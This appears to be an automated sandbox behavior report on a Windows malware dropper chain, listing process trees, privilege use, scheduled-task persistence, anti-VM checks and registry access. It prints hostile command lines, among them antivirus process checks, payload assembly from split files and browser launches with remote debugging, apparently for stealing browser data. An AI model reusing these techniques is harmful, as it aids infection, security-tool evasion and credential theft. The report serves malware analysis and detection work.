6972 PING.EXE 3140 PING.EXE 2788 PING.EXE 6052 PING.EXE 2476 PING.EXE 6236 3924 2288 PING.EXE 5524 PING.EXE 5020 PING.EXE 2204 5256 5264 4036 PING.EXE 4940 PING.EXE 5772 PING.EXE 492 PING.EXE 132 PING.EXE 4512 PING.EXE 1276 PING.EXE 3696 PING.EXE 5368 PING.EXE 576 6132 PING.EXE 2040 PING.EXE 5700 PING.EXE 6324 PING.EXE 3324 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 52 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 6524 schtasks.exe 6332 schtasks.exe 5640 4196 schtasks.exe 1436 schtasks.exe 5616 schtasks.exe 6636 schtasks.exe 1112 schtasks.exe 1512 schtasks.exe 2540 schtasks.exe 1688 schtasks.exe 544 schtasks.exe 6844 schtasks.exe 4880 schtasks.exe 1572 schtasks.exe 5240 schtasks.exe 3864 schtasks.exe 8616 6068 1440 schtasks.exe 1180 schtasks.exe 7416 5824 7508 1020 schtasks.exe 3004 schtasks.exe 5276 schtasks.exe 5440 1504 schtasks.exe 5648 schtasks.exe 5216 schtasks.exe 6300 schtasks.exe 6356 schtasks.exe 3164 schtasks.exe 6988 schtasks.exe 6312 schtasks.exe 6280 schtasks.exe 1272 schtasks.exe 5092 schtasks.exe 2184 schtasks.exe 656 schtasks.exe 5908 schtasks.exe 6892 schtasks.exe 5628 schtasks.exe 5156 schtasks.exe 6032 schtasks.exe 6140 schtasks.exe 7032 1524 schtasks.exe 404 schtasks.exe 6684 schtasks.exe 2064 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 510 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
random.exeskotes.exerodda.exeL.exeReynolds.comMesa.com214554010.exe99add6fb7b.exe59b2d16d94.exemsedge.exechrome.exeReynolds.comexplorer.exe22277f3eaa.exepid Process 4924 random.exe 4924 random.exe 3352 skotes.exe 3352 skotes.exe 872 rodda.exe 872 rodda.exe 2752 L.exe 2752 L.exe 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 1984 Mesa.com 1984 Mesa.com 1984 Mesa.com 1984 Mesa.com 4524 214554010.exe 4524 214554010.exe 6524 99add6fb7b.exe 6524 99add6fb7b.exe 1984 Mesa.com 1984 Mesa.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 7132 59b2d16d94.exe 7132 59b2d16d94.exe 6188 msedge.exe 6188 msedge.exe 4832 chrome.exe 4832 chrome.exe 7004 Reynolds.com 1704 explorer.exe 1704 explorer.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
Processes:
chrome.exechrome.exemsedge.exechrome.exemsedge.exepid Process 4832 chrome.exe 4832 chrome.exe 4832 chrome.exe 4080 chrome.exe 4080 chrome.exe 4080 chrome.exe 5924 msedge.exe 5924 msedge.exe 5924 msedge.exe 5924 msedge.exe 6324 chrome.exe 6324 chrome.exe 6324 chrome.exe 6616 msedge.exe 6616 msedge.exe 6616 msedge.exe 6616 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.exetasklist.exetasklist.exetasklist.exetasklist.exewindowshost.exe214554010.exeplswork.exeClient.exetaskkill.exetaskkill.exetaskkill.exechrome.exefirefox.exetaskkill.exeexplorer.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exeae588fb112.exetaskkill.exedescription pid Process Token: SeDebugPrivilege 796 4363463463464363463463463.exe Token: SeDebugPrivilege 3228 tasklist.exe Token: SeDebugPrivilege 3004 tasklist.exe Token: SeDebugPrivilege 1484 tasklist.exe Token: SeDebugPrivilege 4288 tasklist.exe Token: SeDebugPrivilege 2400 windowshost.exe Token: SeDebugPrivilege 4524 214554010.exe Token: SeDebugPrivilege 568 plswork.exe Token: SeDebugPrivilege 6400 Client.exe Token: SeDebugPrivilege 6900 taskkill.exe Token: SeDebugPrivilege 6892 taskkill.exe Token: SeDebugPrivilege 6912 taskkill.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeDebugPrivilege 1156 firefox.exe Token: SeDebugPrivilege 1156 firefox.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeDebugPrivilege 1488 taskkill.exe Token: SeLockMemoryPrivilege 1704 explorer.exe Token: SeLockMemoryPrivilege 1704 explorer.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeShutdownPrivilege 4832 chrome.exe Token: SeCreatePagefilePrivilege 4832 chrome.exe Token: SeDebugPrivilege 2228 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 6716 powershell.exe Token: SeDebugPrivilege 1452 taskkill.exe Token: SeDebugPrivilege 1096 taskkill.exe Token: SeDebugPrivilege 6784 ae588fb112.exe Token: SeDebugPrivilege 6580 taskkill.exe Token: SeIncreaseQuotaPrivilege 6716 powershell.exe Token: SeSecurityPrivilege 6716 powershell.exe Token: SeTakeOwnershipPrivilege 6716 powershell.exe Token: SeLoadDriverPrivilege 6716 powershell.exe Token: SeSystemProfilePrivilege 6716 powershell.exe Token: SeSystemtimePrivilege 6716 powershell.exe Token: SeProfSingleProcessPrivilege 6716 powershell.exe Token: SeIncBasePriorityPrivilege 6716 powershell.exe Token: SeCreatePagefilePrivilege 6716 powershell.exe Token: SeBackupPrivilege 6716 powershell.exe Token: SeRestorePrivilege 6716 powershell.exe Token: SeShutdownPrivilege 6716 powershell.exe Token: SeDebugPrivilege 6716 powershell.exe Token: SeSystemEnvironmentPrivilege 6716 powershell.exe Token: SeRemoteShutdownPrivilege 6716 powershell.exe Token: SeUndockPrivilege 6716 powershell.exe Token: SeManageVolumePrivilege 6716 powershell.exe Token: 33 6716 powershell.exe Token: 34 6716 powershell.exe Token: 35 6716 powershell.exe Token: 36 6716 powershell.exe Token: SeIncreaseQuotaPrivilege 6716 powershell.exe Token: SeSecurityPrivilege 6716 powershell.exe Token: SeTakeOwnershipPrivilege 6716 powershell.exe Token: SeLoadDriverPrivilege 6716 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Reynolds.comwindowshost.exeMesa.comClient.exechrome.exefirefox.exe22277f3eaa.exeexplorer.exefirefox.exepid Process 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 2400 windowshost.exe 1984 Mesa.com 1984 Mesa.com 1984 Mesa.com 6400 Client.exe 4832 chrome.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 1156 firefox.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 1704 explorer.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 7156 22277f3eaa.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe 5992 firefox.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Reynolds.comwindowshost.exeMesa.comClient.exe22277f3eaa.exedwm.exepid Process 868 Reynolds.com 868 Reynolds.com 868 Reynolds.com 2400 windowshost.exe 1984 Mesa.com 1984 Mesa.com 1984 Mesa.com 6400 Client.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 7156 22277f3eaa.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe 6316 dwm.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
Client.exefirefox.exefirefox.exesvchost.exe%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exemain-pc.exejerniuiopu.exepid Process 6400 Client.exe 1156 firefox.exe 5992 firefox.exe 5980 svchost.exe 5308 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5308 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5308 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5992 main-pc.exe 3576 jerniuiopu.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exerandom.exeskotes.exe69e99dc7e7.execmd.execmd.exe0fVlNye.exet1.exevg9qcBa.execmd.exedescription pid Process procid_target PID 796 wrote to memory of 4924 796 4363463463464363463463463.exe 78 PID 796 wrote to memory of 4924 796 4363463463464363463463463.exe 78 PID 796 wrote to memory of 4924 796 4363463463464363463463463.exe 78 PID 4924 wrote to memory of 3352 4924 random.exe 79 PID 4924 wrote to memory of 3352 4924 random.exe 79 PID 4924 wrote to memory of 3352 4924 random.exe 79 PID 3352 wrote to memory of 3036 3352 skotes.exe 80 PID 3352 wrote to memory of 3036 3352 skotes.exe 80 PID 3036 wrote to memory of 1508 3036 69e99dc7e7.exe 81 PID 3036 wrote to memory of 1508 3036 69e99dc7e7.exe 81 PID 1508 wrote to memory of 3124 1508 cmd.exe 83 PID 1508 wrote to memory of 3124 1508 cmd.exe 83 PID 3124 wrote to memory of 3132 3124 cmd.exe 85 PID 3124 wrote to memory of 3132 3124 cmd.exe 85 PID 3124 wrote to memory of 2100 3124 cmd.exe 86 PID 3124 wrote to memory of 2100 3124 cmd.exe 86 PID 3352 wrote to memory of 872 3352 skotes.exe 87 PID 3352 wrote to memory of 872 3352 skotes.exe 87 PID 3352 wrote to memory of 872 3352 skotes.exe 87 PID 3352 wrote to memory of 2752 3352 skotes.exe 88 PID 3352 wrote to memory of 2752 3352 skotes.exe 88 PID 3352 wrote to memory of 2752 3352 skotes.exe 88 PID 796 wrote to memory of 2796 796 4363463463464363463463463.exe 89 PID 796 wrote to memory of 2796 796 4363463463464363463463463.exe 89 PID 796 wrote to memory of 2796 796 4363463463464363463463463.exe 89 PID 3352 wrote to memory of 4360 3352 skotes.exe 90 PID 3352 wrote to memory of 4360 3352 skotes.exe 90 PID 3352 wrote to memory of 4360 3352 skotes.exe 90 PID 4360 wrote to memory of 1328 4360 0fVlNye.exe 91 PID 4360 wrote to memory of 1328 4360 0fVlNye.exe 91 PID 4360 wrote to memory of 1328 4360 0fVlNye.exe 91 PID 2796 wrote to memory of 1176 2796 t1.exe 93 PID 2796 wrote to memory of 1176 2796 t1.exe 93 PID 2796 wrote to memory of 1176 2796 t1.exe 93 PID 3352 wrote to memory of 3036 3352 skotes.exe 94 PID 3352 wrote to memory of 3036 3352 skotes.exe 94 PID 3352 wrote to memory of 3036 3352 skotes.exe 94 PID 3036 wrote to memory of 3964 3036 vg9qcBa.exe 96 PID 3036 wrote to memory of 3964 3036 vg9qcBa.exe 96 PID 3036 wrote to memory of 3964 3036 vg9qcBa.exe 96 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 3036 wrote to memory of 4544 3036 vg9qcBa.exe 97 PID 1328 wrote to memory of 3228 1328 cmd.exe 98 PID 1328 wrote to memory of 3228 1328 cmd.exe 98 PID 1328 wrote to memory of 3228 1328 cmd.exe 98 PID 1328 wrote to memory of 1572 1328 cmd.exe 99 PID 1328 wrote to memory of 1572 1328 cmd.exe 99 PID 1328 wrote to memory of 1572 1328 cmd.exe 99 PID 1328 wrote to memory of 3004 1328 cmd.exe 101 PID 1328 wrote to memory of 3004 1328 cmd.exe 101 PID 1328 wrote to memory of 3004 1328 cmd.exe 101 PID 1328 wrote to memory of 4996 1328 cmd.exe 102 PID 1328 wrote to memory of 4996 1328 cmd.exe 102 PID 1328 wrote to memory of 4996 1328 cmd.exe 102 PID 1328 wrote to memory of 1588 1328 cmd.exe 103 PID 1328 wrote to memory of 1588 1328 cmd.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\1005824001\69e99dc7e7.exe"C:\Users\Admin\AppData\Local\Temp\1005824001\69e99dc7e7.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\cmd.execmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\PING.EXEping localhost -n 18⤵PID:3132
-
-
C:\Users\Admin\AppData\Local\kreon.exeC:\Users\Admin\AppData\Local\kreon.exe8⤵
- Executes dropped EXE
PID:2100
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007319001\rodda.exe"C:\Users\Admin\AppData\Local\Temp\1007319001\rodda.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\1008835001\0fVlNye.exe"C:\Users\Admin\AppData\Local\Temp\1008835001\0fVlNye.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd6⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"7⤵PID:1572
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"7⤵
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294427⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l7⤵PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:868 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:7004 -
C:\Windows\explorer.exeexplorer.exe9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1704
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:3276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"6⤵
- Executes dropped EXE
PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"6⤵
- Executes dropped EXE
PID:4544
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe"C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Appreciate Appreciate.cmd && Appreciate.cmd6⤵
- System Location Discovery: System Language Discovery
PID:2980 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"7⤵PID:1020
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"7⤵PID:4668
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3975067⤵
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Concept + ..\Mix + ..\Trunk + ..\Answers + ..\Bufing + ..\Benefits + ..\Ram + ..\Guides k7⤵PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\397506\Mesa.comMesa.com k7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1984 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4080 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbc2fbcc40,0x7ffbc2fbcc4c,0x7ffbc2fbcc589⤵PID:6436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:29⤵PID:2688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1648,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2076 /prefetch:39⤵PID:3156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:89⤵PID:7120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:19⤵
- Uses browser remote debugging
PID:2824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3440,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:19⤵
- Uses browser remote debugging
PID:6156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4472,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4476 /prefetch:19⤵
- Uses browser remote debugging
PID:4596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:89⤵PID:1732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4936,i,12333692156790830004,8500519816527325745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:89⤵PID:6084
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5924 -
